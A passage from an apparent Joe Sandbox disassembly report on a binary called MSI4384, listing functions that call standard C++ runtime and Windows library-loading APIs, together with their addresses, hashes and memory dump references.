                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 004452E3
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00445303
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID: :H
                                                                    • API String ID: 2854358121-3114238791
                                                                    • Opcode ID: d23cdef8c791a337078e29a81d93e62c7baaee45b8203188dd2e86fcd5b98366
                                                                    • Instruction ID: 726416c6c452cc4d18023c0ac580fb844e031b4c8a0e61a3f603beb8b9b1e1c9
                                                                    • Opcode Fuzzy Hash: d23cdef8c791a337078e29a81d93e62c7baaee45b8203188dd2e86fcd5b98366
                                                                    • Instruction Fuzzy Hash: D10104319001259BDF04FFA5D8516AE7761AF44718F60441FE8106B3D2DF7C9E04CB89
                                                                    Function 0043A5F2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043A5F9
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A603
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043A654
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A674
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID: l:H
                                                                    • API String ID: 2854358121-3810720909
                                                                    • Opcode ID: 96c268ab4ae47bf143a321f37df6e069e01f818c5455a38e57b983ca8ef4a82f
                                                                    • Instruction ID: 4ad3a71f87091da1bfc462cf99ab6d6474fd22ee739bf224fb7c7885a13049a4
                                                                    • Opcode Fuzzy Hash: 96c268ab4ae47bf143a321f37df6e069e01f818c5455a38e57b983ca8ef4a82f
                                                                    • Instruction Fuzzy Hash: 4B0144319001159BCB08FFA5D8526AE7764BF88718F18001FE441A73D1DF3C8A018BCA
                                                                    Function 0043A687 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043A68E
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A698
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043A6E9
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A709
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID: D:H
                                                                    • API String ID: 2854358121-3581733845
                                                                    • Opcode ID: 57999039d69a764d2a64963d3fb662358605574463dc4c862ab426b07494fed5
                                                                    • Instruction ID: 00f94eed9016229caeb47af2b47c28f5a91776ebb40141501b9f8925307539e5
                                                                    • Opcode Fuzzy Hash: 57999039d69a764d2a64963d3fb662358605574463dc4c862ab426b07494fed5
                                                                    • Instruction Fuzzy Hash: 9C01043190011A9BCB05EFA5D8956AE7771BF48718F15441EE4516B391DF7C8E048B8A
                                                                    Function 0043AD83 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043AD8A
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AD94
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043ADE5
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043AE05
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID: `:H
                                                                    • API String ID: 2854358121-3929540073
                                                                    • Opcode ID: 00ed16011bec27d92f419315d474be231d385d3b3073496bf5bf17b3803072db
                                                                    • Instruction ID: 3414fa6942ea93f478ef99ba6f29e4e9cbd954cd897745f67dad5c6ef4dfc541
                                                                    • Opcode Fuzzy Hash: 00ed16011bec27d92f419315d474be231d385d3b3073496bf5bf17b3803072db
                                                                    • Instruction Fuzzy Hash: D60104319401259BCB08EFA5D856AAE7761AF88718F14441EE55167381DF788E048BCA
                                                                    Function 0043AE18 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043AE1F
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AE29
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043AE7A
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043AE9A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID: @:H
                                                                    • API String ID: 2854358121-3530900233
                                                                    • Opcode ID: 2c3e297458951211d611193e9e8c84f0f5e84452bdbc0255f8319965db9e1959
                                                                    • Instruction ID: 747a2199115846a8716355940533813b5eda791dea68b3b2515832e6ffef53e4
                                                                    • Opcode Fuzzy Hash: 2c3e297458951211d611193e9e8c84f0f5e84452bdbc0255f8319965db9e1959
                                                                    • Instruction Fuzzy Hash: CA0104319401259BCB05FFA5D8566BEB761AF88718F14441FE450AB391DF7C8E049B8A
                                                                    Function 0043AEAD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043AEB4
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043AEBE
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • std::_Facet_Register.LIBCPMT ref: 0043AF0F
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043AF2F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                    • String ID: d:H
                                                                    • API String ID: 2854358121-3979455797
                                                                    • Opcode ID: cf4b9cfe282717ba272f46e793d04e807d85a7ac4f0ac13cf5a18f26fd6f1578
                                                                    • Instruction ID: 3651cbdb4aaf36b73a50bce3dae20a38b63534f3580f28e64fd0c4a07dd499e7
                                                                    • Opcode Fuzzy Hash: cf4b9cfe282717ba272f46e793d04e807d85a7ac4f0ac13cf5a18f26fd6f1578
                                                                    • Instruction Fuzzy Hash: 44012675A001159BCB04FFA5D8556AE7765AF88718F25041FF450A73C1DF7C8E058B8E
                                                                    Function 0045A628 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F3E52339,?,?,00000001,0046D620,000000FF,?,0045A61D,?,?,0045A5F4,?,?), ref: 0045A65D
                                                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0045A66F
                                                                    • FreeLibrary.KERNEL32(00000000,?,00000001,0046D620,000000FF,?,0045A61D,?,?,0045A5F4,?,?), ref: 0045A691
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 5b451e1eed8cc319f61dc5ecd65c45329ee9e38e1817b6e546b16a4be376f70e
                                                                    • Instruction ID: d71e901e9314d492d80ae2fb437310b8c5d32df6d4429465a5ab07ba4ebafe67
                                                                    • Opcode Fuzzy Hash: 5b451e1eed8cc319f61dc5ecd65c45329ee9e38e1817b6e546b16a4be376f70e
                                                                    • Instruction Fuzzy Hash: 3301A731944615EFCB118F80DC05FEEBBF8FB04751F040636F851A2290EBB99904CA49
                                                                    Function 0045F0FA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,0045F064,?,?,?,?,?,0045F188,0000001A,AppPolicyGetProcessTerminationMethod,00474848,AppPolicyGetProcessTerminationMethod,?), ref: 0045F109
                                                                    • GetLastError.KERNEL32(?,0045F064,?,?,?,?,?,0045F188,0000001A,AppPolicyGetProcessTerminationMethod,00474848,AppPolicyGetProcessTerminationMethod,?,?,0046167E,00000000), ref: 0045F113
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 0045F151
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: LibraryLoad$ErrorLast
                                                                    • String ID: api-ms-$ext-ms-
                                                                    • API String ID: 3177248105-537541572
                                                                    • Opcode ID: 8dde708775c775824b0af4bcb6f9d5add4dca741faf66494c4e23f5b601d9c02
                                                                    • Instruction ID: ea93ed2220634e25255537958449e233674621ddfaf14134995d1ad82fa97795
                                                                    • Opcode Fuzzy Hash: 8dde708775c775824b0af4bcb6f9d5add4dca741faf66494c4e23f5b601d9c02
                                                                    • Instruction Fuzzy Hash: 75F08230640204F6DF211A61ED06F593F569B01B52F644032FD4CE42E2E7A9FD5C998E
                                                                    Function 0043A7B1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043A7B8
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A7C2
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • messages.LIBCPMT ref: 0043A7FC
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A833
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3messages
                                                                    • String ID: p:H
                                                                    • API String ID: 50917705-4129203865
                                                                    • Opcode ID: df03c2ad19f7674bb8e0ea5e6cf22ba8c82e958105c33273d87ce5fc4a00ab1f
                                                                    • Instruction ID: 2d999c8a5d62a9d28f5c3ef17a039e35f7387758ea061b8c58cd380dedc8f010
                                                                    • Opcode Fuzzy Hash: df03c2ad19f7674bb8e0ea5e6cf22ba8c82e958105c33273d87ce5fc4a00ab1f
                                                                    • Instruction Fuzzy Hash: 3EF096319401165BDB09FFA1C8966BE2334AF54B19F50441EF5506B2D1EF3C8A15879E
                                                                    Function 0043A846 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 34COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0043A84D
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0043A857
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::_Lockit.LIBCPMT ref: 0042C020
                                                                      • Part of subcall function 0042BFF0: std::_Lockit::~_Lockit.LIBCPMT ref: 0042C048
                                                                    • messages.LIBCPMT ref: 0043A891
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0043A8C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3messages
                                                                    • String ID: H:H
                                                                    • API String ID: 50917705-3697676977
                                                                    • Opcode ID: 98ba5f8d063f93a7231b48c5fb964e294a8d606694a491408bb5b15178e86708
                                                                    • Instruction ID: 3a05afa95ad2f9531a10a1ad7de6d8592aa6089e8e0e44c9673a70ad2b9a5ab5
                                                                    • Opcode Fuzzy Hash: 98ba5f8d063f93a7231b48c5fb964e294a8d606694a491408bb5b15178e86708
                                                                    • Instruction Fuzzy Hash: 45F0F03194011A9ADB0CFFA1C852BAE7324AF04B1DF50041FF5106B2C1DF3C8A058BCA
                                                                    Function 0045E99C Relevance: 7.7, APIs: 5, Instructions: 199COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __alloca_probe_16.LIBCMT ref: 0045EA1F
                                                                    • __alloca_probe_16.LIBCMT ref: 0045EAE8
                                                                    • __freea.LIBCMT ref: 0045EB4F
                                                                      • Part of subcall function 0045D330: HeapAlloc.KERNEL32(00000000,?,?,?,0045CD65,?,00000000,?,0044E0E9,?,?,?,?,?,?,0042163C), ref: 0045D365
                                                                    • __freea.LIBCMT ref: 0045EB62
                                                                    • __freea.LIBCMT ref: 0045EB6F
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                    • String ID:
                                                                    • API String ID: 1096550386-0
                                                                    • Opcode ID: 62b98d2ce3533249c67303d12fcc67212e2fd03b269f00e16ba9abe05989b61d
                                                                    • Instruction ID: 2dfbeef67e81b9eda89e0919af1773002bcad98b869fb2de0b33d3d06f69f41a
                                                                    • Opcode Fuzzy Hash: 62b98d2ce3533249c67303d12fcc67212e2fd03b269f00e16ba9abe05989b61d
                                                                    • Instruction Fuzzy Hash: 3351D872A00205AFEF289F62CC41EBB36A9EF44716F25042EFD05D6252E678ED04C66D
                                                                    Function 0042C840 Relevance: 7.6, APIs: 5, Instructions: 109COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042C86D
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042C890
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042C8B8
                                                                    • std::_Facet_Register.LIBCPMT ref: 0042C92D
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042C961
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                    • String ID:
                                                                    • API String ID: 459529453-0
                                                                    • Opcode ID: b74b16f1e51192fea10616ee2cff43f69e5c4b0d8ceaefd41ff4c2a20533e0b5
                                                                    • Instruction ID: bb9f2dfc9f985d7cf39d9d11b06f0a766da78106a00a69a2c2ebbc30e9d79534
                                                                    • Opcode Fuzzy Hash: b74b16f1e51192fea10616ee2cff43f69e5c4b0d8ceaefd41ff4c2a20533e0b5
                                                                    • Instruction Fuzzy Hash: 4B41DEB190111A9FCB00EF54E980BAEFBB4FF48314F14816EE414A7391D778AA05CB99
                                                                    Function 0042F240 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042F26D
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042F290
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042F2B8
                                                                    • std::_Facet_Register.LIBCPMT ref: 0042F32D
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042F361
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                    • String ID:
                                                                    • API String ID: 459529453-0
                                                                    • Opcode ID: 8e71190626f1053007a528890efec77dba629134f705f1977dec74a1b5e487c5
                                                                    • Instruction ID: 0ea9a6ad183d7ce8a1c20678e99057d609c89c60d28fdc78ef6b936aef7b7222
                                                                    • Opcode Fuzzy Hash: 8e71190626f1053007a528890efec77dba629134f705f1977dec74a1b5e487c5
                                                                    • Instruction Fuzzy Hash: 53410371900219DFCB10DF54E8407AEBBB4FB44724FA5857ED81067391D738AE04CB99
                                                                    Function 0042EA80 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042EAAD
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042EAD0
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042EAF8
                                                                    • std::_Facet_Register.LIBCPMT ref: 0042EB6D
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042EBA1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                    • String ID:
                                                                    • API String ID: 459529453-0
                                                                    • Opcode ID: 6886a1cd06f3d211745018517b886e2ba1788a0489c4ec65c2f2d5bfa69a4783
                                                                    • Instruction ID: c337a0aeeb011169451686a79e22dd06b15a19abccf12beac5f34ec395fd7c51
                                                                    • Opcode Fuzzy Hash: 6886a1cd06f3d211745018517b886e2ba1788a0489c4ec65c2f2d5bfa69a4783
                                                                    • Instruction Fuzzy Hash: A3410D7090022ADFCB00DF49E840BAEFBB4FB44324F14856ED81167391D738AE00CB99
                                                                    Function 0042EBC0 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042EBED
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0042EC10
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042EC38
                                                                    • std::_Facet_Register.LIBCPMT ref: 0042ECAD
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0042ECE1
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
                                                                    • Associated: 00000003.00000002.1743375933.0000000000420000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743517261.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743547075.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.1743584791.0000000000487000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_420000_MSI4384.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                    • String ID:
                                                                    • API String ID: 459529453-0
                                                                    • Opcode ID: 7cbcc05dae6d2c11b8ba6ec470ad10dfe8cf2e506513f2973be751700a2cdb12
                                                                    • Instruction ID: ed7f02a4aaa4c1987b0433834c6edc133454cd93301af3f63c991608b455e69a
                                                                    • Opcode Fuzzy Hash: 7cbcc05dae6d2c11b8ba6ec470ad10dfe8cf2e506513f2973be751700a2cdb12
                                                                    • Instruction Fuzzy Hash: 9541F271901216DFDB05DF9AE9807AEFBB4FB44324F15816ED810A7390D738AE05CB99
                                                                    Function 00427E40 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000010,00000010,?,00427ACB,?,?,?), ref: 00427E47
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.1743438745.0000000000421000.00000020.00000001.01000000.00000003.sdmp, Offset: 00420000, based on PE: true
